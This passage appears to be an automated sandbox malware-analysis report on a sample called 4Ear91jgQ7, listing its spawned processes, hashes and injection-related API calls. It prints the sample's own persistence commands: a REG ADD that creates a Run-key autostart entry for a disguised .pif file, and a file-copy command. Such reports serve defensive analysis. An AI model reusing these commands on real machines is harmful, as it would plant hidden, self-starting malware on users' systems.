                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:73
                                                            Start time:08:51:10
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif"
                                                            Imagebase:0xe40000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:74
                                                            Start time:08:51:12
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:75
                                                            Start time:08:51:12
                                                            Start date:23/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:13.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:3.1%
                                                              Total number of Nodes:228
                                                              Total number of Limit Nodes:27
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $kq$,gq$,gq$4ccq$4ccq$hkq$hkq$hkq$|bdq$|bdq$|bdq$#"$$cq$$cq$$cq$S $ccq$ccq$ccq$ccq
                                                              • API String ID: 0-3301557462
                                                              • Opcode ID: 406bc90e8727d5520e5494e7eb0bcfa8e3beced35bf559bb3126b7e4f7dca7e6
                                                              • Instruction ID: a884967755a8817b474ab0a005c132ac006931ea48036296cfdce186f2cd779d
                                                              • Opcode Fuzzy Hash: 406bc90e8727d5520e5494e7eb0bcfa8e3beced35bf559bb3126b7e4f7dca7e6
                                                              • Instruction Fuzzy Hash: E7B24C74B002148FDB65DF29C9A4A6AB7F2FF89310F1585AAE50ADB3A1DB30DC41CB51

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Hgq$Hgq$Hgq$Hgq$Tecq$Tecq
                                                              • API String ID: 0-365889919
                                                              • Opcode ID: 7a27ce48b33e052380fba7973b82d77501aeebd7d8ab76f71ec39cd747f3828e
                                                              • Instruction ID: 2d4fb00c5d4eb70f8d687d96b99d73b82806e0ea2700fe9ea47a0fd0669ab1d8
                                                              • Opcode Fuzzy Hash: 7a27ce48b33e052380fba7973b82d77501aeebd7d8ab76f71ec39cd747f3828e
                                                              • Instruction Fuzzy Hash: 7602B574E041498FCB85DFA8C9906FEBBB2FF89310F1585AAD405AB391CB349D45CBA1

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,00000000,?), ref: 064A8BC1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: acbcd9e579b08ba89d34ed39c8fd547eeaa15abde853f92f0aa3ea07d10cec91
                                                              • Instruction ID: c56c58082a46f55b0628004a15176b1822123ef109d3791e016ff9173a7518f2
                                                              • Opcode Fuzzy Hash: acbcd9e579b08ba89d34ed39c8fd547eeaa15abde853f92f0aa3ea07d10cec91
                                                              • Instruction Fuzzy Hash: A091F5B1D00309AFDB55CFA9C844BDEBBB2EF98300F24822AE415AB290D7709945CF51

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,00000000,?), ref: 064A8BC1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: e7609e34c7616cd8a042119ca413d1a51f336f34905c04e8b2489f3a5046d00b
                                                              • Instruction ID: 2ffd5440ed5e29acc5a24699a798db7a4f42d2345b8a9e63d492f019b2ef0eaf
                                                              • Opcode Fuzzy Hash: e7609e34c7616cd8a042119ca413d1a51f336f34905c04e8b2489f3a5046d00b
                                                              • Instruction Fuzzy Hash: 1D91E5B1D00319EFDB55CFA9C84479EBBF2EF98300F24862AE415AB290D774A945CF91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: 49d4bea5d1a5f43eaeee3b729283a70484ef0a925adbb8cd2df183636d0daeb2
                                                              • Instruction ID: 66acb378067f73e02abfe8305edb390602da9a5c7e9a448df19607524ad4afc7
                                                              • Opcode Fuzzy Hash: 49d4bea5d1a5f43eaeee3b729283a70484ef0a925adbb8cd2df183636d0daeb2
                                                              • Instruction Fuzzy Hash: 0C026F30A00205DFDB6ADF64C864AAE7BB6BF89304F14846EE5069B391DB35DD46CF90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 722964a5f5f26f58b41b08ac67c2790319d69db015c1c23f1d4489236769ccdb
                                                              • Instruction ID: 776d0b7ced1cf0bc3d04236db9d01500c0d2e6f3f49e0d05e95617930f36e65d
                                                              • Opcode Fuzzy Hash: 722964a5f5f26f58b41b08ac67c2790319d69db015c1c23f1d4489236769ccdb
                                                              • Instruction Fuzzy Hash: CF329471B002149BDB58AF798D5466FB6A6FFC8300F64C55DD80AEB396DE30DD828B90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7f8c6228d0a70be58e0a80e08d72172e96472d532a99239217213b057ba11b07
                                                              • Instruction ID: 28a4da6b2de0fe7157f2d01ea43d2a4ea828f17532bccb6fddcbafd2e87d157b
                                                              • Opcode Fuzzy Hash: 7f8c6228d0a70be58e0a80e08d72172e96472d532a99239217213b057ba11b07
                                                              • Instruction Fuzzy Hash: 83425A71E00610CFDB668F25C66866ABBF2FF8A305F14496EE142CB391CB75E885CB51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2139979923.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6410000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $#cq$(Ahq$(ocq$, cq$,gq$,gq$0"cq$4'cq$4ccq$Hbdq$LRcq$PHcq$Ppcq$X#cq$\;cq$\scq$p cq$p<cq$pBhq$p`cq$x hq$xgq$|bdq$|hq$hq$$cq$;cq$ccq
                                                              • API String ID: 0-3498234681

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 00F5E026
                                                              • GetCurrentThread.KERNEL32 ref: 00F5E063
                                                              • GetCurrentProcess.KERNEL32 ref: 00F5E0A0
                                                              • GetCurrentThreadId.KERNEL32 ref: 00F5E0F9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2134011088.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f50000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2139979923.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6410000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$#}ql^$|ql^
                                                              • API String ID: 0-585904171

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 064AB31E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID: (
                                                              • API String ID: 963392458-3887548279

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2139979923.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6410000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$#}ql^
                                                              • API String ID: 0-283590088

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (gq$(gq
                                                              • API String ID: 0-3425431731

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2139979923.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6410000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,gq
                                                              • API String ID: 0-3993090981
                                                              • Opcode ID: 0ba3764ce6c5dd279cfc56a35184e872f2604f42d1dcc024fca6284be16e153d
                                                              • Instruction ID: a6eb226cb0563be4c5862ac9723c859fc47df1d1e12006ea299d86cd1acfa78c
                                                              • Opcode Fuzzy Hash: 0ba3764ce6c5dd279cfc56a35184e872f2604f42d1dcc024fca6284be16e153d
                                                              • Instruction Fuzzy Hash: 31625E747006008FD755DF39C894A6ABBE6FF89314B1584AAE506CF3A2DB71EC45CBA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2139979923.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6410000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $cq
                                                              • API String ID: 0-2110363268
                                                              • Opcode ID: 259980fe03f7eda3c83ea4189215ec09a29d7e7e90efd464ee85c943c50be3aa
                                                              • Instruction ID: a9d59b655f687c5e51d1ce5d874263f8bdac5b414e8b265a3bf8ba9538ca18f3
                                                              • Opcode Fuzzy Hash: 259980fe03f7eda3c83ea4189215ec09a29d7e7e90efd464ee85c943c50be3aa
                                                              • Instruction Fuzzy Hash: AA12BF75B40215CFDB658BA4C898B6ABBB2FF88710F14856AD9069F390CB75DC42CBD0
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00F5BB5E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2134011088.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f50000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 6411ffeaa890e38da0a0cedc7687e3e467f404f33152f61a8150c3074846224e
                                                              • Instruction ID: 96b0fa1db4613f451d27a6e2b62501dfabe960240ba853106d6c63c22fb20a8b
                                                              • Opcode Fuzzy Hash: 6411ffeaa890e38da0a0cedc7687e3e467f404f33152f61a8150c3074846224e
                                                              • Instruction Fuzzy Hash: 068169B0A00B058FDB24DF2AD44575ABBF1FF88311F108A2DD98ADBA41D774E949CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2139979923.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6410000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $cq
                                                              • API String ID: 0-2110363268
                                                              • Opcode ID: b832d311e4c68b5d485e6f792d039fdf7ed79e43534d8cfe0b5864ab1c070140
                                                              • Instruction ID: 772206882883f23cc0ef40ff71407556fc8d6ddafad02b2ad8dbffd3ddb64285
                                                              • Opcode Fuzzy Hash: b832d311e4c68b5d485e6f792d039fdf7ed79e43534d8cfe0b5864ab1c070140
                                                              • Instruction Fuzzy Hash: ACF15F34B002158FCB55DF69C554AAEB7F6FF88710B15856AE906EB3A5DB30DC02CBA0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Hgq
                                                              • API String ID: 0-2103768809
                                                              • Opcode ID: 115233c34fd4f80c29e5fe38e69300ee1697212eef5122dd55453fa2cdbd524c
                                                              • Instruction ID: 585fb20a0ac1b19e1b7d77c8715a756948e6c593acc412231c5ae9724150a05e
                                                              • Opcode Fuzzy Hash: 115233c34fd4f80c29e5fe38e69300ee1697212eef5122dd55453fa2cdbd524c
                                                              • Instruction Fuzzy Hash: 1DF19271A012189FDB55DFA8D884ADEBBF6FF89310F14805AE815AB351CB31ED85CB90
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 064AADD0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 003362b9632750d77841f2bf7eb104d8c9214a1f431c2850cdec5c9d3f5b2e4c
                                                              • Instruction ID: 7bc2f03d67bbd31ccdbb3a0f2c79171607f5bf74fb91b3e38c01a85ec9078828
                                                              • Opcode Fuzzy Hash: 003362b9632750d77841f2bf7eb104d8c9214a1f431c2850cdec5c9d3f5b2e4c
                                                              • Instruction Fuzzy Hash: 16316B71A003499FDB51DFA9C845BEEBBF5FF48310F10842AE958A7341DB78A944CBA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Hgq
                                                              • API String ID: 0-2103768809
                                                              • Opcode ID: 55c0cf179215402394e7915fc2c10436ea026353fee95b5a223db9366af36e20
                                                              • Instruction ID: 3db0d3ff317c8eb8ff3b913c7fefd5a192d9abcb60b4d9bf29632feab05cce56
                                                              • Opcode Fuzzy Hash: 55c0cf179215402394e7915fc2c10436ea026353fee95b5a223db9366af36e20
                                                              • Instruction Fuzzy Hash: 60D15A71F002199FDB95DF69C884AAEBBF6EF88300F14846AE505DB391DB34D945CBA0
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 00F56161
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2134011088.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f50000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: de6b0d735afe1d3d8fc52c178856e794833211390f715f6a90e7075d0c5538d9
                                                              • Instruction ID: 5d2dadac3e3335cf3cead36240e1cd15947c0e8e8ba5ec99f9da174e21f34a35
                                                              • Opcode Fuzzy Hash: de6b0d735afe1d3d8fc52c178856e794833211390f715f6a90e7075d0c5538d9
                                                              • Instruction Fuzzy Hash: EC41DFB0D00719CFDB24CFA9C844B9DBBF2BF49704F20816AD518AB251DB75694ACF90
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 00F56161
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2134011088.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f50000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: dbf406428e039196d62ce5a719d80921dc7c20984ac4d024c916934721836991
                                                              • Instruction ID: 77050061dba23ae0774c58411345e5e87e03adf920afd5062fa185c28262db38
                                                              • Opcode Fuzzy Hash: dbf406428e039196d62ce5a719d80921dc7c20984ac4d024c916934721836991
                                                              • Instruction Fuzzy Hash: 3741E2B0C00719CBDB24DFA9C844B9DFBF5BF49704F60806AD918AB251DB756949CF90
                                                              APIs
                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 064AAEF8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 58f9439332e19828def8a2d5f8989b8300f7bc7ebb88512fad8b320aaedb663e
                                                              • Instruction ID: 9b997678c37951c43bce0db444e75ef73bf941c24a6420664b8468499c6fef46
                                                              • Opcode Fuzzy Hash: 58f9439332e19828def8a2d5f8989b8300f7bc7ebb88512fad8b320aaedb663e
                                                              • Instruction Fuzzy Hash: 92317C719003499FDB10DFAAD885BEFBBF5FF48310F10842AE918A7241DB759945CBA1
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 064AA726
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: adaea0348350b6974f3810df5d1090944ade18cde83392b9c719c51133a3a176
                                                              • Instruction ID: e2f728f37a073974542bbb5eccbc95124bff02397bb85372aee131159d71ac25
                                                              • Opcode Fuzzy Hash: adaea0348350b6974f3810df5d1090944ade18cde83392b9c719c51133a3a176
                                                              • Instruction Fuzzy Hash: 6D315C75E003099FDB50DFA9C884BEFBBF5EB98314F14842AD518AB341CB789945CBA1
                                                              APIs
                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 064AABEE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 5a6d5b4165a46d6b5fd3656d93c1a44a8d671f2f55395a70fb07cda6375841c6
                                                              • Instruction ID: 9ba111cc1d0b8cbda2474daac4a81cf150e1e2b9a49c549dbca0a71d5a82d8ad
                                                              • Opcode Fuzzy Hash: 5a6d5b4165a46d6b5fd3656d93c1a44a8d671f2f55395a70fb07cda6375841c6
                                                              • Instruction Fuzzy Hash: E8218D359003499FDB11DFA9C944BEFBBF6EF88310F14841AE519A7250C779A944CBA1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: dd4c1cb4d72da158a51c93724d23b375acbc154585773883846581d938040291
                                                              • Instruction ID: 1c6f4c5ddf2b10791cdd29adae70e81d81cf28c1b7f24651eab19f0e1d14fab3
                                                              • Opcode Fuzzy Hash: dd4c1cb4d72da158a51c93724d23b375acbc154585773883846581d938040291
                                                              • Instruction Fuzzy Hash: D621B275E003888FDB50DB6AD84479FBBF5EF89314F14842AD518A7340CB75A844CBA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: &
                                                              • API String ID: 0-1010288
                                                              • Opcode ID: 55fb341201a54f0c0c3d9ca6676a47792c46659097556b378126a4715c365c76
                                                              • Instruction ID: c3dd279868ec80244d5c7e148b9c0177a5cc0cce3291bdd358212124cfd3be59
                                                              • Opcode Fuzzy Hash: 55fb341201a54f0c0c3d9ca6676a47792c46659097556b378126a4715c365c76
                                                              • Instruction Fuzzy Hash: D7C1AC757006129FDB999F35869047A7BE3BFC4210345896AE85BCB382DF34EC06CBA1
                                                              APIs
                                                              • WaitForInputIdle.USER32(00000000), ref: 064A8D80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: IdleInputWait
                                                              • String ID:
                                                              • API String ID: 2200289081-0
                                                              • Opcode ID: b3762400bc3ea3b8217693e760126ee3ea13f0dd02ec53af00837846ffb001f5
                                                              • Instruction ID: 6e5209d043d34277cc76ed463a32c0a7f5acfacec015ab7b3d239313433fc109
                                                              • Opcode Fuzzy Hash: b3762400bc3ea3b8217693e760126ee3ea13f0dd02ec53af00837846ffb001f5
                                                              • Instruction Fuzzy Hash: 482124B4D00248AFDB64CFAAD984B9EBFF5EF58304F24805AE408A7340CB719805CFA1
                                                              APIs
                                                              • WaitForInputIdle.USER32(00000000), ref: 064A8D80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: IdleInputWait
                                                              • String ID:
                                                              • API String ID: 2200289081-0
                                                              • Opcode ID: 1fa7f8472c72a44e275952da9dd51614f7cd5791bc40e6ea9fa42b7889a033e2
                                                              • Instruction ID: fe3c9f411db1058fa3140d12e339e2d8363be0724b7eb13760b6cc44ec6c4076
                                                              • Opcode Fuzzy Hash: 1fa7f8472c72a44e275952da9dd51614f7cd5791bc40e6ea9fa42b7889a033e2
                                                              • Instruction Fuzzy Hash: 5421F6B0D10258AFCB54CFA9D584B9EBFF5EF58304F24805AE418A7350CB749805CFA1
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F5E277
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2134011088.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f50000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: c7d3ca96bbcf287a7d94d3f9b0ffd54307d7495937e0a08a39f9376104376c81
                                                              • Instruction ID: 81377fa4ec4bc92d89add5d9c40c87bd0fe5c32c1c9645793593e07d93700532
                                                              • Opcode Fuzzy Hash: c7d3ca96bbcf287a7d94d3f9b0ffd54307d7495937e0a08a39f9376104376c81
                                                              • Instruction Fuzzy Hash: E221B0B5D002499FDB10CFAAD984ADEBBF9EB48320F14841AE918A3250D374A954DFA5
                                                              APIs
